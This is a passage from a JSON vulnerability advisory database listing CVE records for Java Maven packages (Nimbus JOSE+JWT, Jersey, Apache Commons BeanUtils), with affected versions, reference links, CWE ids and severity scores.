"ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12974" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/f3a7a801f0c6b078899fed9226368eb7b44e2b2f" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/217/explicit-check-for-ec-public-key-on-curve" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/src/master/CHANGELOG.txt" }, { "type": "PACKAGE", "url": "https://github.com/felx/nimbus-jose-jwt" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T20:20:30Z", "nvd_published_at": "2017-08-20T16:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xwmg-2g98-w7v9", "published": "2025-07-11T03:30:34Z", "modified": "2025-09-19T21:45:11.861171Z", "aliases": [ "CVE-2025-53864" ], "related": [ "CGA-3852-7xcx-96qx", "CGA-8gr5-54h9-6g76", "CGA-c923-6h8p-37xc", "CGA-cxqr-5r5g-9rgj", "CGA-mpwh-pghw-hw5x" ], "summary": "Nimbus JOSE + JWT is vulnerable to DoS attacks when processing deeply nested JSON", "details": "Connect2id Nimbus JOSE + JWT before 10.0.2 allows a remote attacker to cause a denial of service via a deeply nested JSON object supplied in a JWT claim set, because of uncontrolled recursion. NOTE: this is independent of the Gson 2.11.0 issue because the Connect2id product could have checked the JSON object nesting depth, regardless of what limits (if any) were imposed by Gson.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.38-rc1" }, { "fixed": "10.0.2" } ] } ], "versions": [ "10.0", "10.0.1", "9.38", "9.38-rc1", "9.38-rc3", "9.38-rc4", "9.38-rc5", "9.39", "9.39.1", "9.39.2", "9.39.3", "9.40", "9.41", "9.41.1", "9.41.2", "9.42", "9.43", "9.44", "9.45", "9.46", "9.47", "9.48" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-xwmg-2g98-w7v9/GHSA-xwmg-2g98-w7v9.json" } }, { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.37.4" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.39", "4.39.1", "4.39.2", "4.4", "4.40", "4.41", "4.41.1", "4.41.2", "4.41.3", "4.5", "4.6", "4.7", "4.8", "4.9", "5.0", "5.1", "5.10", "5.11", "5.12", "5.13", "5.14", "5.2", "5.3", "5.4", "5.5", "5.6", "5.7", "5.8", "5.9", "6.0", "6.0.1", "6.0.2", "6.1", "6.1.1", "6.2", "6.3", "6.3.1", "6.4", "6.4.1", "6.4.2", "6.5", "6.5.1", "6.6", "6.7", "6.8", "7.0", "7.0.1", "7.1", "7.2.1", "7.3", "7.4", "7.5", "7.5.1", "7.6", "7.7", "7.8", "7.8.1", "7.9", "8.0", "8.1", "8.10", "8.11", "8.12", "8.13", "8.14", "8.14.1", "8.15", "8.16", "8.17", "8.17.1", "8.18", "8.18.1", "8.19", "8.2", "8.2.1", "8.20", "8.20.1", "8.20.2", "8.21", "8.21.1", "8.22", "8.22.1", "8.23", "8.3", "8.4", "8.4.1", "8.5", "8.5.1", "8.6", "8.7", "8.8", "8.9", "9.0", "9.0.1", "9.1", "9.1.1", "9.1.2", "9.1.3", "9.1.4", "9.1.5", "9.10", "9.10.1", "9.11", "9.11.1", "9.11.2", "9.11.3", "9.12", "9.12.1", "9.13", "9.14", "9.15", "9.15.1", "9.15.2", "9.16", "9.16-preview.1", "9.16.1", "9.17", "9.18", "9.19", "9.2", "9.20", "9.21", "9.21.1", "9.22", "9.23", "9.24", "9.24.1", "9.24.2", "9.24.3", "9.24.4", "9.25", "9.25.1", "9.25.2", "9.25.3", "9.25.4", "9.25.5", "9.25.6", "9.26", "9.27", "9.28", "9.29", "9.3", "9.30", "9.30.1", "9.30.2", "9.31", "9.32", "9.33", "9.34", "9.35", "9.36", "9.37", "9.37.1", "9.37.2", "9.37.3", "9.4", "9.4.1", "9.4.2", "9.5", "9.6", "9.6.1", "9.7", "9.8", "9.8.1", "9.9", "9.9.1", "9.9.2", "9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-xwmg-2g98-w7v9/GHSA-xwmg-2g98-w7v9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53864" }, { "type": "WEB", "url": "https://github.com/google/gson/commit/1039427ff0100293dd3cf967a53a55282c0fef6b" }, { "type": "PACKAGE", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/f7fb882cc08f027c9ceb874acec3b51c6222861c" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/583/stackoverflowerror-due-to-deeply-nested" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/593/back-port-cve-2025-53864-fix-to-9x-branch" }, { "type": "WEB", "url": "https://github.com/google/gson/compare/gson-parent-2.11.0...gson-parent-2.12.0" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2025-07-11T16:43:40Z", "nvd_published_at": "2025-07-11T03:16:03Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5m48-vr54-vmh3", "published": "2022-05-17T19:57:08Z", "modified": "2025-06-19T18:13:37.881595Z", "aliases": [ "CVE-2014-3643" ], "summary": "jersey: XXE via parameter entities", "details": "jersey: XXE via parameter entities not disabled by the jersey SAX parser", "affected": [ { "package": { "name": "com.sun.jersey:jersey-core", "ecosystem": "Maven", "purl": "pkg:maven/com.sun.jersey/jersey-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.13" } ] } ], "versions": [ "0.9-ea", "1.0", "1.0.1", "1.0.2", "1.0.3", "1.0.3.1", "1.1.0-ea", "1.1.1-ea", "1.1.2-ea", "1.1.3-ea", "1.1.4", "1.1.4.1", "1.1.5", "1.1.5-ea-20100104", "1.1.5-ea-v20091019", "1.1.5.1", "1.1.5.2", "1.10", "1.10-b01", "1.10-b02", "1.10-b03", "1.10-b04", "1.10-b05", "1.11", "1.11-b01", "1.11-b02", "1.11-b03", "1.11-b04", "1.11.1", "1.11.2", "1.12", "1.12-b01", "1.13-b01", "1.2", "1.3", "1.4", "1.4-ea01", "1.4-ea02", "1.4-ea03", "1.4-ea04", "1.4-ea05", "1.4-ea06", "1.5", "1.5-ea01", "1.5-ea02", "1.5-ea03", "1.5-ea04", "1.5-ea05", "1.5-ea06", "1.5-ea07", "1.5-ea08", "1.5-ea09", "1.6", "1.6-ea01", "1.6-ea02", "1.6-ea03", "1.6-ea04", "1.6-ea05", "1.6-ea06", "1.7", "1.7-ea01", "1.7-ea02", "1.7-ea03", "1.7-ea04", "1.7-ea05", "1.7-ea06", "1.7-ea07", "1.8", "1.8-ea01", "1.8-ea02", "1.8-ea03", "1.8-ea04", "1.9", "1.9-ea01", "1.9-ea02", "1.9-ea03", "1.9-ea04", "1.9-ea06", "1.9-ea07", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-5m48-vr54-vmh3/GHSA-5m48-vr54-vmh3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3643" }, { "type": "WEB", "url": "https://github.com/javaee/jersey-1.x/commit/49f1e5a6ac608ccb51939205e4739f328f2223e6" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/cve-2014-3643" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-3643" }, { "type": "PACKAGE", "url": "https://github.com/javaee/jersey-1.x" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.sourceclear.com/vulnerability-database/security/xml-external-entity-xxe/java/sid-22175" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2025-06-19T17:08:27Z", "nvd_published_at": "2019-12-15T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6phf-73q6-gh87", "published": "2020-06-15T20:36:17Z", "modified": "2024-03-08T05:28:43.649817Z", "aliases": [ "CVE-2019-10086" ], "related": [ "CGA-3x75-f9j7-7hm9" ], "summary": "Insecure Deserialization in Apache Commons Beanutils", "details": "In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by default characteristic of the PropertyUtilsBean.", "affected": [ { "package": { "name": "commons-beanutils:commons-beanutils", "ecosystem": "Maven", "purl": "pkg:maven/commons-beanutils/commons-beanutils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.4" } ] } ], "versions": [ "1.0", "1.2", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.6.1", "1.7.0", "1.8.0", "1.8.0-BETA", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "1.9.2", "1.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6phf-73q6-gh87/GHSA-6phf-73q6-gh87.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10086" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4317" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra41fd0ad4b7e1d675c03a5081a16a6603085a4e37d30b866067566fe@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra87ac17410a62e813cba901fdd4e9a674dd53daaf714870f28e905f1@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9a139fdc0999750dcd519e81384bc1fe3946f311b1796221205f51c@%3Ccommits.dolphinscheduler.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd3e7b2149fa2f255f016bd6bffab0fea77b6fb81c50db9a17f78e6@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae81e0c8ebdf47ffaa85a01240836bfece8a990c48f55c7933162b5c@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb1f76c2c0a4d6efb8a3523974f9d085d5838b73e7bffdf9a8f212997@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8dac04cb7e9cc5dedee8dabaa1c92614f590642e5ebf02a145915ba@%3Ccommits.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcc029be4edaaf5b8bb85818aab494e16f312fced07a0f4a202771ba2@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd2d2493f4f1af6980d265b8d84c857e2b7ab80a46e1423710c448957@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re2028d4d76ba1db3e3c3a722d6c6034e801cc3b309f69cc166eaa32b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3cd7cb641d7fc6684e4fc3c336a8bad4a01434bb5625a06e3600fd1@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rec74f3a94dd850259c730b4ba6f7b6211222b58900ec088754aa0534@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reee57101464cf7622d640ae013b2162eb864f603ec4093de8240bb8f@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00030.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4APPGLBWMFAS4WHNLR4LIJ65DJGPV7TF" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIUYSL2RSIWZVNSUIXJTIFPIPIF6OAIO" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0057" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0194" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-beanutils" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/02094ad226dbc17a2368beaf27e61d8b1432f5baf77d0ca995bb78bc@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2fd61dc89df9aeab738d2b49f48d42c76f7d53b980ba04e1d48bce48@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d1ed1a1596c08c4d5fea97b36c651ce167b773f1afc75251ce7a125@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5261066cd7adee081ee05c8bf0e96cf0b2eeaced391e19117ae4daa6@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a684107d3a78e431cf0fbb90629e8559a36ff8fe94c3a76e620b39fa@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c94bc9649d5109a663b2129371dc45753fbdeacd340105548bbe93c3@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d6ca9439c53374b597f33b7ec180001625597db48ea30356af01145f@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r18d8b4f9263e5cad3bbaef0cdba0e2ccdf9201316ac4b85e23eb7ee4@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d5f1d88c39bd615271abda63964a0bee9b2b57fef1f84cb4c43032e@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r306c0322aa5c0da731e03f3ce9f07f4745c052c6b73f4e78faf232ca@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43de02fd4a4f52c4bdeff8c02f09625d83cd047498009c1cdab857db@%3Cdev.rocketmq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46e536fc98942dce99fadd2e313aeefe90c1a769c5cd85d98df9d098@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r513a7a21c422170318115463b399dd58ab447fe0990b13e5884f0825@%3Ccommits.dolphinscheduler.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6194ced4828deb32023cd314e31f41c61d388b58935d102c7de91f58@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9@%3Cdev.brooklyn.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00007.html" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/www-announce/201908.mbox/%3cC628798F-315D-4428-8CB1-4ED1ECC958E4@apache.org%3e" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T15:08:49Z", "nvd_published_at": "2019-08-20T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p66x-2cv9-qq3v", "published": "2020-06-10T23:38:01Z", "modified": "2024-12-01T05:31:59.449737Z", "aliases": [ "CVE-2014-0114" ], "summary": "Arbitrary code execution in Apache Commons BeanUtils", "details": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.", "affected": [ { "package": { "name": "commons-beanutils:commons-beanutils", "ecosystem": "Maven", "purl": "pkg:maven/commons-beanutils/commons-beanutils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.8.0" }, { "fixed": "1.9.4" } ] } ], "versions": [ "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "1.9.2", "1.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-p66x-2cv9-qq3v/GHSA-p66x-2cv9-qq3v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0114" }, { "type": "WEB", "url": "https://github.com/apache/commons-beanutils/pull/7" }, { "type": "WEB", "url": "https://github.com/apache/commons-beanutils/commit/62e82ad92cf4818709d6044aaf257b73d42659a4" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3Cgitbox.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3Cgitbox.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20150710065242/http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "type": "WEB", "url": "https://web.archive.org/web/20140618110851/http://www.securityfocus.com/bid/67121" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMMONSBEANUTILS-30077" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180629-0006" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20140911-0001" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201607-09" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3Ccommits.dolphinscheduler.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": 